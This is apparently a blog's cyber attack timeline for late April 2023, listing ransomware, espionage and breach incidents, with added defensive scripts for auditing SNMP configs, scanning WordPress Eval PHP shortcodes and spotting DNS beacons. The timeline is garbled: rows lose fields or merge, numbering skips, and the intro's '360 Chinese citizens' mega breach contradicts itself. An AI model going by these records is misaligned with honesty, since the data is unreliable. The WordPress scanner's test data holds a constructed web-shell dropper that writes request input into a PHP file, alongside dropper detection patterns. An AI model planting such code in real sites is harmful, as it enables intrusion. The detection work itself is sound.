In the second half of April 2023 I collected 180 events (corresponding to 12 events/day), a sharp increase compared to the first timeline of April, where the recorded events were 161.
The percentage of events caused by ransomware attacks is stable at 27.2% (49 out of 180 events), similar to the 27.3% of the previous timeline (44 out of 161 events). Vulnerabilities played a part in 26 out of 180 events, corresponding to 14.4%, slightly up from the 12.4% of the first fortnight of April (20 out of 161 events).
Unsurprisingly, multi-million losses continued to plague the fintech sector: both Merlin and 0VIX suffered a cyber heist, each leading to the theft of about $2M worth of cryptocurrency (and they are not the only ones hit in this timeline, even if the other attacks did not achieve the same impact).
In terms of mega breaches there is one remarkable event, even if it is not completely clear: the sale, on a Russian forum, of the details of 360 Chinese citizens. Other interesting events concern the arrest of a Ukrainian individual who stole the details of 360 European citizens, and the breaches of Terravision (2 million records compromised), the American Bar Association (1.5 million records compromised), and NextGen Healthcare, victim of a ransomware attack compromising the details of 1.05 million users.
The cyber espionage front was as hot as ever, with multiple campaigns unearthed also in the second half of April, carried out by known threat actors such as the usual APT28, APT29, APT36, and Sandworm targeting Ukraine. Additionally, Lazarus Group was also very active after the remarkable supply-chain attack against 3CX (and it turns out that even 3CX was itself compromised via an earlier supply-chain attack, on Trading Technologies).
And as always, this brief summary is closed by a quick mention of the attacks launched by the pro-Russian hacktivists of NoName057(16) and Killnet, directed respectively against several websites in Italy and against individuals close to NATO. Last but not least, the collective Anonymous Sudan continued its campaign against Israel.
My suggestion is always the same: browse the timeline, and obviously thanks for sharing it and supporting my work in spreading risk awareness across the community. As always, don’t forget to follow @paulsparrows on Twitter, or even connect on Linkedin, for the latest updates.
Geo Map April H2 2023
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
16/04/2023
Since at least 16/04/2023
16/04/2023
LockBit 3.0
Multiple organizations
The LockBit ransomware gang has created encryptors targeting Macs for the first time, likely becoming the first major ransomware operation to ever specifically target macOS.
Malware
Multiple Industries
Cyber Crime
>1
LockBit, ransomware, macOS.
2
16/04/2023
'Over the past few months'
-
Mint Sandstorm AKA Phosphorous
Critical Infrastructures in the U.S.
Microsoft reveals that the Iranian hacking group known as 'Mint Sandstorm' is conducting cyberattacks on US critical infrastructure in what is believed to be retaliation for recent attacks on Iran's infrastructure.
Targeted Attack
Water supply, waste mgmt, remediation
Cyber Espionage
US
Microsoft, Iran, Mint Sandstorm, Phosphorous
3
16/04/2023
-
-
CrossLock
Valid Certificadora
Valid Certificadora, a Brazilian firm that issues digital certificates used by both businesses and public entities, is added to the CrossLock ransomware leak site.
Malware
Professional, scientific and technical
Cyber Crime
BR
Valid Certificadora, CrossLock, ransomware
4
17/04/2023
From 2016 to present
-
Forty officers of China’s Ministry of Public Security (MPS)
Residents of the United States
Forty officers of China’s Ministry of Public Security (MPS), along with two officials of the Cyberspace Administration of China are accused of running a sophisticated troll farm directed at residents of the United States.
Coordinated Inauthentic Behavior
Individual
Cyber Warfare
US
China’s Ministry of Public Security, MPS, China, United States
5
17/04/2023
'Recently'
'Recently'
Trigona
Misconfigured Microsoft SQL (MS-SQL) servers
Researchers from AhnLab discover that attackers are hacking into poorly secured and Internet-exposed Microsoft SQL (MS-SQL) servers to deploy Trigona ransomware payloads and encrypt all files.
Misconfiguration
Multiple Industries
Cyber Crime
>1
AhnLab, Trigona, ransomware, Microsoft SQL, MS-SQL
6
17/04/2023
Early April 2023
Early April 2023
QBot (AKA QakBot, QuackBot, and Pinkslipbot)
Multiple organizations
Researchers from Kaspersky warn of a new QBot campaign leveraging hijacked business emails to deliver malware.
Malware
Finance and insurance
Cyber Crime
>1
QBot, QakBot, QuackBot, Pinkslipbot, Kaspersky
7
17/04/2023
Since at least January 2023
During January 2023
?
Taxpayers in Australia
Researchers from Cofense discover a phishing email campaign closely imitating the Australian Tax Office (ATO) and MyGov websites.
Account Takeover
Individual
Cyber Crime
AU
Cofense, Australian Tax Office, ATO, MyGov
8
17/04/2023
-
-
APT36 AKA Transparent Tribe
Indian government organizations, military personnel, and defense contractors
Researchers from Uptycs discover Poseidon, a new Linux malware deployed by the Pakistani APT36 group against Indian government organizations, military personnel, and defense contractors; the lure is Kavach, the two-factor authentication (2FA) tool the Indian government provides for secure access to its email services, used as a cover to deliver the Poseidon payload.
Targeted Attack
Public admin and defence, social security
Cyber Espionage
IN
Uptycs, Linux, Poseidon, Pakistan, India, APT36, Transparent Tribe, Kavach
9
17/04/2023
-
-
RedLine Stealer
Multiple organizations
Researchers from ESET, with the help of GitHub, temporarily disrupt the operations of RedLine Stealer by taking down the GitHub repositories the malware used as a dead-drop resolver for its command-and-control servers.
Malware
Multiple Industries
Cyber Crime
>1
ESET, RedLine Stealer, GitHub
10
17/04/2023
30/03/2023
30/03/2023
?
Evide
Evide, a data management company in Northern Ireland, is hit with a ransomware attack.
Malware
Information and communication
Cyber Crime
IE
Evide, Ransomware
11
17/04/2023
03/03/2023
03/03/2023
?
Traditions Bank
Traditions Bank files a notice of data breach after learning that an unauthorized party removed files containing confidential customer information from the bank’s computer system.
Unknown
Finance and insurance
Cyber Crime
US
Traditions Bank
12
17/04/2023
-
18/02/2023
?
Graceworks Lutheran Services
Graceworks Lutheran Services, a social services organization, discloses a breach impacting 6,737 individuals after discovering unauthorized activity within its systems.
Unknown
Human health and social work
Cyber Crime
US
Graceworks Lutheran Services
13
17/04/2023
25/12/2022
18/03/2023
?
Alaska Railroad Corporation (ARRC)
Alaska Railroad Corporation (ARRC) discloses that it suffered a cyber attack compromising the details of 7,413 individuals.
Unknown
Transportation and storage
Cyber Crime
US
Alaska Railroad Corporation, ARRC
14
17/04/2023
-
-
LockBit 3.0
Pineland Schools
Pineland Schools is added to the LockBit ransomware site with some files as proof of claim. The attackers claim to have 64GB of data.
15
Uniondale Union Free School District (UUFSD) in New York is added to Medusa’s leak site with some files leaked.
Malware
Education
Cyber Crime
US
Uniondale Union Free School District, UUFSD, Medusa, ransomware
16
18/04/2023
-
-
APT28 AKA Fancy Bear, STRONTIUM, Sednit, and Sofacy,
Multiple organizations
The UK National Cyber Security Centre (NCSC), US Cybersecurity and Infrastructure Security Agency (CISA), NSA, FBI, and Cisco warn of Russian state-sponsored APT28 hackers deploying a custom malware named 'Jaguar Tooth' on Cisco IOS routers, exploiting CVE-2017-6742, allowing unauthenticated access to the device.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
APT28, Fancy Bear, STRONTIUM, Sednit, Sofacy, UK National Cyber Security Centre, NCSC, US Cybersecurity and Infrastructure Security Agency, CISA, NSA, FBI, Cisco, Jaguar Tooth, Cisco IOS, CVE-2017-6742
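Jaguar Tooth rode on SNMP, so the first thing a practitioner wants after this advisory is a quick audit of their own IOS configs for the exposure that makes such an attack easy: SNMPv1/v2c communities that are guessable, writable, or not limited by an access list, on a device with no SNMPv3 at all. The script below is an added example (not code from Cisco, NCSC or CISA) that parses a running-config and flags those settings; the two configs it ships with are constructed, and the community string, ACL number and SNMPv3 user/group names are placeholders.

```python
"""Audit a Cisco IOS running-config for weak SNMP settings.

Added example, not vendor or advisory code. Constructed configs; the community
string, ACL number and SNMPv3 names are placeholders, not recommendations.
"""
from __future__ import annotations
import re

# Matches: snmp-server community <string> [view <name>] RO|RW [<acl-number|acl-name>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (?P<community>\S+)(?: view \S+)? (?P<mode>RO|RW)(?: (?P<acl>\S+))?$",
    re.IGNORECASE,
)
# Matches: snmp-server group <name> v3 noauth|auth|priv [access <acl>]
V3_GROUP_RE = re.compile(r"^snmp-server group \S+ v3 (noauth|auth|priv)\b", re.IGNORECASE)

# Assumption: community names an attacker will try first.
GUESSABLE = {"public", "private", "cisco", "admin"}


def audit_snmp(config_text: str) -> list[str]:
    """Return one finding per weak SNMP setting; an empty list means nothing was flagged."""
    findings: list[str] = []
    has_v3_group = False
    communities = 0
    for raw in config_text.splitlines():
        line = raw.strip()
        if V3_GROUP_RE.match(line):
            has_v3_group = True
            continue
        m = COMMUNITY_RE.match(line)
        if not m:
            continue
        communities += 1
        community, mode, acl = m["community"], m["mode"].upper(), m["acl"]
        if community.lower() in GUESSABLE:
            findings.append(f"community '{community}': guessable name")
        if mode == "RW":
            findings.append(f"community '{community}': read-write access")
        if acl is None:
            findings.append(f"community '{community}': no access-list restricts who may query it")
    if communities and not has_v3_group:
        findings.append("SNMPv1/v2c communities configured but no SNMPv3 group: the community string is the only secret")
    return findings


# Constructed weak config: default communities, RW enabled, no ACL, no SNMPv3.
WEAK_CONFIG = """\
hostname edge-router
snmp-server community public RO
snmp-server community private RW
snmp-server location DC1
"""

# Constructed hardened config: non-default RO community restricted by ACL 10,
# plus an SNMPv3 authPriv group and user (placeholder credentials).
HARDENED_CONFIG = """\
hostname edge-router
access-list 10 permit 10.0.0.0 0.0.0.255
access-list 10 deny any log
snmp-server community Zq7mKd92pX RO 10
snmp-server group NMS-GROUP v3 priv access 10
snmp-server user nms-poller NMS-GROUP v3 auth sha CHANGE-ME-AUTH priv aes 128 CHANGE-ME-PRIV
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{label}]")
        for finding in audit_snmp(cfg) or ["no findings"]:
            print("  -", finding)
```

Feed it `show running-config` output from each device; the hardened fragment shows the shape the advisory steers toward (ACL-bound read-only community, SNMPv3 with auth and priv), and a device that still needs v2c for a legacy poller should at least drop RW and bind the community to an ACL.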
17
18/04/2023
-
-
Play
Multiple organizations
Security Researchers at Symantec/Broadcom reveal that the Play ransomware group has developed two custom tools in .NET, namely Grixba and VSS Copying Tool, used to improve the effectiveness of its cyberattacks.
18
Google releases a security update for the Chrome web browser to fix CVE-2023-2136, the second zero-day vulnerability found to be exploited in attacks this year.
CVE-2023-2136 Vulnerability
Unknown
N/A
N/A
Google, Chrome, CVE-2023-2136
19
18/04/2023
16/03/2023
16/03/2023
Royal
Town of Ballwin
The local government of Ballwin, a St. Louis, Missouri suburb is investigating a “network security incident” that is believed to have started last month but is still affecting systems. The Royal ransomware gang claims responsibility for the attack.
Malware
Public admin and defence, social security
Cyber Crime
US
Ballwin, St. Louis, Royal, ransomware
20
18/04/2023
During 2022
During 2022
?
Israeli citizen involved in the country's protest movement
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'LATENTIMAGE' iOS zero day vulnerability to allegedly target an unrevealed Israeli citizen involved in the country's protest movement.
21
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'FINDMYPWN' iOS 15 zero day vulnerability to target members of Mexico’s civil society.
Targeted Attack
Individual
Cyber Espionage
MX
Centro PRODH, Citizen Lab, Pegasus, NSO Group, FINDMYPWN, iOS 15
22
18/04/2023
During October 2022
During October 2022
?
Human rights defender from Centro PRODH
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'PWNYOURHOME' iOS 15 and iOS 16 zero day vulnerability to target members of Mexico’s civil society.
23
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an old Apple macOS vulnerability to its list of currently exploited flaws.
CVE-2019-8526 Vulnerability
Unknown
N/A
US
U.S. Cybersecurity and Infrastructure Security Agency, CISA, CVE-2019-8526, macOS
24
18/04/2023
During fall of 2022
Since 30/06/2022
MuddyWater (AKA MERCURY, Mango Sandstorm, Seedworm, and Static Kitten) and DEV-1084 (AKA Storm-1084)
Multiple organizations
Researchers from Group-IB discover a new campaign by the Iranian government-sponsored threat actor known as MuddyWater, using the legitimate SimpleHelp remote support software tool to achieve persistence on victim devices.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
Group-IB, MuddyWater, SimpleHelp
25
18/04/2023
Since December 2022
16/04/2023
?
Early adopters of cryptocurrency and blockchain technology
A mysterious and sophisticated crypto wallet heist has drained up to 5,000 Ethereum, currently worth almost USD 10 million, from "OG" wallets (wallets of early adopters).
Unknown vulnerability
Fintech
Cyber Crime
>1
Ethereum, OG Wallets
26
18/04/2023
'Recently'
'Recently'
?
Multiple organizations
Researchers from Zscaler discover a new multifunctional backdoor called 'Devopt'.
Malware
Multiple Industries
Cyber Crime
>1
Zscaler, Devopt
27
18/04/2023
During March 2023
During March 2023
APT-C-36 AKA Blind Eagle
Multiple organizations
Researchers from ThreatMon discover a new campaign by the cyber espionage actor tracked as Blind Eagle using a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Targeted Attack
Multiple Industries
Cyber Espionage
EC
ES
CL
CO
APT-C-36, Blind Eagle, ThreatMon, NjRAT
28
18/04/2023
During 2022
During 2022
Raspberry Robin
Multiple organizations
Researchers from Check Point discover a new version of the Raspberry Robin using new anti-evasion techniques.
Malware
Multiple Industries
Cyber Crime
>1
Check Point, Raspberry Robin
29
18/04/2023
Between March 2022 and May 2022
-
?
Huntington Ingalls Industries (HII)
Huntington Ingalls Industries (HII) files a notice of data breach after learning that confidential consumer information stored on the company’s computer network was accessed by an unauthorized party.
Unknown
Manufacturing
Cyber Crime
US
Huntington Ingalls Industries, HII
30
18/04/2023
-
01/12/2022
?
West Technology Group (WTG)
West Technology Group (WTG) files a notice of data breach after confirming that an unauthorized party was able to access and remove confidential employee information from the company’s computer network.
Unknown
Information and communication
Cyber Crime
US
West Technology Group, WTG
31
18/04/2023
27/10/2022
Between 26/10/2022 and 27/10/2022
?
Bryant Bank
Bryant Bank files a notice of data breach after determining that an unauthorized party was able to access confidential customer information stored on the company’s computer network.
Unknown
Finance and insurance
Cyber Crime
US
Bryant Bank
32
18/04/2023
-
-
Royal
Lake Dallas Independent School District
The Royal ransomware gang adds Lake Dallas Independent School District in Texas to its leak site.
Malware
Education
Cyber Crime
US
Royal, ransomware, Lake Dallas Independent School District
33
18/04/2023
From 18/04/2023
From 18/04/2023
NoName057(16)
Multiple websites in Italy
The pro-Russian hacktivist group NoName057(16) starts its campaign against Italy and takes down multiple websites, including those of the Italian Labour Ministry, the Carabinieri, the Italian High Council of the Judiciary (Consiglio Superiore Della Magistratura), Azienda Trasporti Milanesi (ATM), multiple airports, several banks, and the Ministry of Infrastructure and Transport.
DDoS
Multiple Industries
Hacktivism
IT
Russia, NoName057(16), Italian Labour Ministry, Ministero del Lavoro, Carabinieri, High Council of the Judiciary, Consiglio Superiore Della Magistratura, Azienda Trasporti Milanesi, ATM, Ministry of Infrastructure and Transport
34
19/04/2023
19/04/2023
19/04/2023
Killnet
EUROCONTROL
Europe’s air-traffic control agency EUROCONTROL announces that it is under attack from the Killnet pro-Russian attackers.
DDoS
Extraterritorial orgs and bodies
Hacktivism
EU
Killnet, EUROCONTROL, Russia
35
19/04/2023
Over the past few months
Over the past few months
Russian Wagner-like cyber groups
Critical Infrastructure in the UK
The British government warns that “emerging Wagner-like cyber groups are attempting to cause maximum damage to the UK's critical national infrastructure.”
Unknown
Electricity, gas steam, air conditioning
Cyber Warfare
UK
British Government, Wagner
36
19/04/2023
Since at least 18/04/2023
18/04/2023
Ghostwriter
Individuals in Poland
Poland's Ministry of National Defense issues a warning about a recent disinformation campaign traced back to the Belarusian hacking group known as Ghostwriter.
Coordinated Inauthentic Behavior
Individual
Cyber Warfare
PL
Ministry of National Defense, Belarus, Ghostwriter
37
19/04/2023
-
-
FIN11 and TA505 (Clop AKA Cl0p)
Unknown organization(s)
Print management software developer PaperCut warns customers to update their software immediately, as hackers are actively exploiting two flaws, ZDI-CAN-18987 / PO-1216 and ZDI-CAN-19226 / PO-1219, to gain access to vulnerable servers. Later the attacks are attributed to the Cl0p ransomware gang.
ZDI-CAN-18987 / PO-1216 (CVE-2023-27350) and ZDI-CAN-19226 / PO-1219 (CVE-2023-27351) Vulnerabilities
38
Researchers from Sophos reveal that threat actors are using a new hacking tool dubbed AuKill to disable Endpoint Detection & Response (EDR) software on targets' systems before deploying backdoors and ransomware in Bring Your Own Vulnerable Driver (BYOVD) attacks.
Malware
Multiple Industries
Cyber Crime
>1
Sophos, AuKill, Endpoint Detection & Response, EDR, Bring Your Own Vulnerable Driver, BYOVD
39
19/04/2023
Since November 2022
During Q1 2022
Sandworm AKA FROZENBARENTS
Energy sector organizations in Eastern Europe
Researchers from Google's Threat Analysis Group (TAG) reveal that the Russian threat actor Sandworm conducted multiple campaigns against energy sector organizations in Eastern Europe, delivering links to fake Windows update packages hosted on a domain spoofing the Caspian Pipeline Consortium (CPC).
Researchers from Google's Threat Analysis Group (TAG) reveal that the Russian threat actor Sandworm targeted the Ukrainian defense industry in multiple credential phishing campaigns.
Researchers from Google's Threat Analysis Group (TAG) reveal that the Russian threat actor Sandworm targeted users following pro-Russia Telegram channels with a phishing campaign.
Researchers from Google's Threat Analysis Group (TAG) reveal that actors attributed to the GRU have maintained a Telegram channel to promote and amplify narratives related to the use of biological weapons in Ukraine and how the United States is responsible for the proliferation of biological weapons around the world.
Actors affiliated with the Internet Research Agency (IRA)
Internet users
Researchers from Google's Threat Analysis Group (TAG) observe a coordinated Information Operation (OP) campaign from actors affiliated with the Internet Research Agency (IRA) creating content on YouTube, including commenting on and upvoting each other’s videos, focusing particularly on narratives supportive of Russia and of the business interests of Russian oligarch Yevgeny Prigozhin, especially the Wagner Group.
Coordinated Inauthentic Behavior
Information and communication
Cyber Warfare
>1
Google, Threat Analysis Group, TAG, Russia, Ukraine, Information Operation, OP, Internet Research Agency, IRA, YouTube, Yevgeny Prigozhin, Wagner Group
45
19/04/2023
Since April 2023
During April 2023
?
Multiple organizations
Researchers from Sucuri reveal that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Vulnerable WordPress plugin
Multiple Industries
Cyber Crime
>1
Sucuri, Eval PHP, WordPress
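The Eval PHP plugin runs whatever sits between its `[evalphp]` and `[/evalphp]` shortcode tags when a post is rendered, which is why an attacker who can save a post gets code execution without touching the filesystem first. Drafts matter too: they are never shown to visitors but are still stored in wp_posts, so a scan has to cover every post_status. The script below is an added example (not Sucuri's or the plugin author's code) that pulls those shortcode blocks out of post content and scores them with a handful of dropper indicators; the sample rows are constructed (the IDs and content are made up), and in a real run they would come from `SELECT ID, post_status, post_content FROM wp_posts`.

```python
"""Scan WordPress post content for code hidden in Eval PHP shortcodes.

Added example, not Sucuri's or the plugin's code. The posts below are
constructed; the indicator list is an assumption, not a complete signature set.
"""
from __future__ import annotations
import re

SHORTCODE_RE = re.compile(r"\[evalphp\](.*?)\[/evalphp\]", re.IGNORECASE | re.DOTALL)

# Assumption: indicators that separate a backdoor dropper from benign plugin use.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "file_put_contents": re.compile(r"\bfile_put_contents\s*\("),
    "request_input": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "hex_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}"),  # obfuscated paths or names
}


def evalphp_blocks(posts: list[dict]) -> list[tuple[int, str, str]]:
    """Return (post ID, post_status, PHP source) for every Eval PHP shortcode found."""
    blocks = []
    for post in posts:
        for code in SHORTCODE_RE.findall(post["post_content"]):
            blocks.append((post["ID"], post["post_status"], code.strip()))
    return blocks


def flagged_posts(posts: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (post ID, sorted indicator names) for shortcode blocks that look like droppers."""
    flagged = []
    for post_id, _status, code in evalphp_blocks(posts):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(code))
        if hits:
            flagged.append((post_id, hits))
    return flagged


# Constructed sample rows (IDs and content are made up). Post 17 is a draft,
# invisible on the site, carrying a hex-obfuscated path and a file write fed
# from request input: the shape of an injected dropper.
SAMPLE_POSTS = [
    {"ID": 3, "post_status": "publish",
     "post_content": "Welcome! [evalphp] echo date('Y'); [/evalphp] All rights reserved."},
    {"ID": 9, "post_status": "publish",
     "post_content": "Plain post with no shortcode at all."},
    {"ID": 17, "post_status": "draft",
     "post_content": r"""[evalphp]
$p = "\x2e\x2e\x2f\x77\x70\x2d\x63\x6f\x6e\x74\x65\x6e\x74\x2f\x75\x70\x6c\x6f\x61\x64\x73";
file_put_contents($p . "/.cache.php", "<?php " . $_REQUEST["c"]);
[/evalphp]"""},
]

if __name__ == "__main__":
    print(f"{len(evalphp_blocks(SAMPLE_POSTS))} Eval PHP block(s) found")
    for post_id, hits in flagged_posts(SAMPLE_POSTS):
        print(f"post {post_id}: {', '.join(hits)}")
```

Every block the scan returns deserves a look even with no indicator hits, since the legitimate use of the plugin is rare enough that its presence on a site is itself worth questioning; the indicator scoring only orders the queue.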
46
19/04/2023
17/04/2023
17/04/2023
?
Point32Health
Point32Health, a New England health insurance firm serving more than two million people, is dealing with a ransomware attack impacting several of its systems.
Malware
Finance and insurance
Cyber Crime
US
Point32Health, ransomware
47
19/04/2023
During April 2023
During April 2023
Russia
Organizations in Finland
Kirsi Karlamaa, director general of the Finnish Transport and Communications Agency (Traficom), reveals that Finnish organizations are increasingly being targeted with cyberattacks, two weeks after the country officially joined the North Atlantic Treaty Organization.
N/A
Multiple Industries
Cyber Espionage
FI
Kirsi Karlamaa, Finnish Transport and Communications Agency, Traficom, NATO, North Atlantic Treaty Organization, Russia
48
19/04/2023
Between Q4 2021 and Q4 2022
Between Q4 2021 and Q4 2022
Multiple threat actors
Multiple organizations
Researchers from Palo Alto Networks warn of a spike in abuse of the InterPlanetary File System (IPFS) by threat actors for multiple malicious purposes, including phishing, credential theft, command and control communications, and malicious payload distribution.
49
Researchers from Malwarebytes warn of a new wave of 'Muse scams', Instagram scams in which the attackers promise money in exchange for the victims' images.
Instagram scam
Individual
Cyber Crime
>1
Malwarebytes, Muse scam, Instagram
50
19/04/2023
-
-
?
Rubino & Company
Rubino & Company files a notice of data breach after learning that confidential consumer information stored on the company’s IT network was subject to unauthorized access.
Unknown
Professional, scientific and technical
Cyber Crime
US
Rubino & Company
51
19/04/2023
19/10/2022
19/10/2022
?
IMA Financial Group
IMA Financial Group files a notice of data breach after experiencing a data security incident resulting in confidential consumer data being made accessible to an unauthorized party.
Unknown
Finance and insurance
Cyber Crime
US
IMA Financial Group
52
19/04/2023
-
-
LockBit 3.0
Banco de Venezuela
Banco de Venezuela is added to LockBit’s ransomware leak site with some alleged proof of claims that included identity cards and documents.
Malware
Finance and insurance
Cyber Crime
VE
Banco de Venezuela, LockBit, LockBit 3.0, ransomware
53
19/04/2023
-
-
Play
Coldiretti
Coldiretti, the Italian organization of agricultural entrepreneurs, suffers a Play ransomware attack.
Malware
Other service activities
Cyber Crime
IT
Coldiretti, Play, ransomware
54
20/04/2023
-
29/03/2023
Lazarus Group (AKA Labyrinth Chollima, Covellite, UNC4034, Zinc, Nickel Academy)
Trading Technologies
Researchers from Mandiant reveal that the 3CX supply chain attack was caused by another supply chain compromise where suspected North Korean attackers breached the site of stock trading automation company Trading Technologies to push trojanized software builds.
Lazarus Group (AKA Labyrinth Chollima, Covellite, UNC4034, Zinc, Nickel Academy)
People working in software or DeFi platforms
Researchers from ESET discover a new Lazarus campaign considered part of "Operation DreamJob" (AKA Nukesped), targeting Linux users with malware for the first time.
Even the Europa.eu website is observed serving Fortnite spam within the same campaign.
TWiki or MediaWiki vulnerabilities
Extraterritorial orgs and bodies
Cyber Crime
EU
Europa.eu, Fortnite, TWiki, MediaWiki
59
20/04/2023
17/03/2023
Between 06/03/2023 and 17/03/2023
?
American Bar Association (ABA)
The American Bar Association (ABA) discloses a data breach after hackers compromised its network and gained access to older credentials for 1,466,000 members.
Unknown
Professional, scientific and technical
Cyber Crime
US
American Bar Association, ABA
60
20/04/2023
Since at least 16/02/2023
Since at least 16/02/2023
?
Multiple organizations
Researchers at Secureworks discover a new campaign using Google Ads and SEO poisoning to distribute the Bumblebee malware through fake download pages for popular software like Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace.
Malware
Multiple Industries
Cyber Crime
>1
Secureworks, Google Ads, SEO Poisoning, Bumblebee, Zoom, Cisco AnyConnect, ChatGPT, Citrix Workspace
61
20/04/2023
During March 2023
During March 2023
EvilExtractor
Multiple organizations in Europe and the U.S.
Researchers from Fortinet discover a rise in attacks spreading the EvilExtractor data theft tool, used to steal users' sensitive data in Europe and the U.S.
Malware
Multiple Industries
Cyber Crime
EU
US
Fortinet, EvilExtractor
62
20/04/2023
Since at least early April 2023
During early April 2023
Decoy Dog
Multiple organizations
Researchers from Infoblox discover a new enterprise-targeting malware toolkit called ‘Decoy Dog’ after spotting anomalous DNS traffic that stands out from regular internet activity.
Malware
Multiple Industries
Cyber Crime
>1
Infoblox, Decoy Dog
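Decoy Dog was found in DNS telemetry before anyone had a sample, which is the useful lesson of this entry: a DNS-tunnelling C2 leaves a statistical fingerprint even when the payload is unknown. Two features do most of the work per (client, registered domain) pair: the share of queries whose name was never seen before (encoded C2 traffic looks like random labels under one parent domain) and the regularity of the gaps between queries (a scheduled beacon has little jitter, whereas browsing and CDN lookups do not). The script below is an added example (not Infoblox's or any resolver vendor's code) that computes both over a resolver log; the four-column log format is an assumption, the lines are constructed, and `beacon.example` is a made-up domain.

```python
"""Flag DNS beaconing to an ever-changing set of subdomains at a fixed cadence.

Added example, not Infoblox's code. Assumed log format:
'<iso-timestamp> <client-ip> <qname> <qtype>'. The lines are constructed.
"""
from __future__ import annotations
import statistics
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
2023-04-20T10:00:00 10.0.0.5 www.example.com A
2023-04-20T10:00:00 10.0.0.5 a3f9c1k2.beacon.example A
2023-04-20T10:01:00 10.0.0.5 b71e02xq.beacon.example A
2023-04-20T10:01:37 10.0.0.5 www.example.com A
2023-04-20T10:02:00 10.0.0.5 c0d8aa1p.beacon.example A
2023-04-20T10:03:00 10.0.0.5 d4e2f9m7.beacon.example A
2023-04-20T10:03:12 10.0.0.5 cdn.example.net A
2023-04-20T10:04:00 10.0.0.5 e9a0b3r1.beacon.example A
2023-04-20T10:05:00 10.0.0.5 f1c7d5s8.beacon.example A
2023-04-20T10:05:45 10.0.0.5 www.example.com A
2023-04-20T10:06:00 10.0.0.5 0a1b2c3t4.beacon.example A
2023-04-20T10:07:00 10.0.0.5 9f8e7d6u5.beacon.example A
2023-04-20T10:09:03 10.0.0.5 cdn.example.net A
2023-04-20T10:14:50 10.0.0.5 www.example.com A
2023-04-20T10:15:20 10.0.0.5 cdn.example.net AAAA
2023-04-20T10:21:09 10.0.0.5 www.example.com A
"""


def parse(log: str) -> list[tuple[datetime, str, str]]:
    """Parse log lines into (timestamp, client, lower-cased qname); qtype is not needed here."""
    records = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, qname, _qtype = line.split()
        records.append((datetime.fromisoformat(ts), client, qname.lower().rstrip(".")))
    return records


def registered_domain(qname: str) -> str:
    """Last two labels; enough for the example (production code would use a public-suffix list)."""
    return ".".join(qname.split(".")[-2:])


def beacon_candidates(records, min_queries=6, min_new_ratio=0.8, max_cv=0.25) -> list[tuple[str, str]]:
    """Return (client, domain) pairs whose query stream looks like a beacon.

    min_new_ratio: fraction of queries with a never-before-seen qname.
    max_cv: upper bound on the coefficient of variation of inter-query gaps.
    """
    by_pair: dict[tuple[str, str], list[tuple[datetime, str]]] = defaultdict(list)
    for ts, client, qname in sorted(records):
        by_pair[(client, registered_domain(qname))].append((ts, qname))
    hits = []
    for pair, entries in by_pair.items():
        if len(entries) < min_queries:
            continue
        new_ratio = len({q for _, q in entries}) / len(entries)
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(entries, entries[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if new_ratio >= min_new_ratio and cv <= max_cv:
            hits.append(pair)
    return hits


if __name__ == "__main__":
    for client, domain in beacon_candidates(parse(SAMPLE_LOG)):
        print(f"possible beacon: {client} -> *.{domain}")
```

The thresholds are starting points, not tuned values: on a real resolver log the new-name ratio alone will also light up CDNs and telemetry endpoints that use per-request hostnames, and it is the combination with a near-constant cadence, sustained over many queries, that narrows the list to something an analyst can review.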
63
20/04/2023
Since 25/01/2023
During January 2023
Xiaoqiying AKA Genesis Day or Teng Snake
Multiple organizations in South Korea including the Korean Research Institute for Construction Policy, the Korean Archaeological Society, the Woorimal Academic Society, the Korean Academy of Basic Medicine & Health Science, and more.
Researchers from Recorded Future discover a new wave of attacks of the Chinese threat actor known as Xiaoqiying, targeting organizations in South Korea.
Targeted Attack
Multiple Industries
Cyber Espionage
KR
Xiaoqiying, Genesis Day, Teng Snake, China, South Korea, Korean Research Institute for Construction Policy, Korean Archaeological Society, Woorimal Academic Society, Korean Academy of Basic Medicine & Health Science, Recorded Future
64
20/04/2023
'Recently'
'Recently'
Xiaoqiying AKA Genesis Day or Teng Snake
Organizations in Japan and Taiwan
Researchers from Recorded Future discover a new wave of attacks of the Chinese threat actor known as Xiaoqiying, targeting organizations in Japan and Taiwan.
Targeted Attack
Multiple Industries
Cyber Espionage
JP
TW
Xiaoqiying, Genesis Day, Teng Snake, China
65
20/04/2023
Since at least November 2022
-
Evasive Panda (AKA BRONZE HIGHLAND and Daggerfly)
Telecommunications organization in Africa
Researchers from Broadcom/Symantec discover a new campaign of the Chinese Daggerfly threat actor targeting a telecommunications organization in Africa via the PlugX malware and the MgBot malware framework.
66
Researchers from Palo Alto Networks reveal a 910% increase in monthly registrations for domains related to ChatGPT and associated with scam operations.
Scam
Multiple Industries
Cyber Crime
>1
Palo Alto Networks, ChatGPT
67
20/04/2023
12/04/2023
12/04/2023
?
Fincantieri Marinette Marine
Fincantieri Marinette Marine, a US commercial and defense shipbuilder with ties to the government, discloses that it was hit by a ransomware attack.
Malware
Professional, scientific and technical
Cyber Crime
US
Fincantieri Marinette Marine, ransomware
68
20/04/2023
-
-
Shiny Hunters
RentoMojo
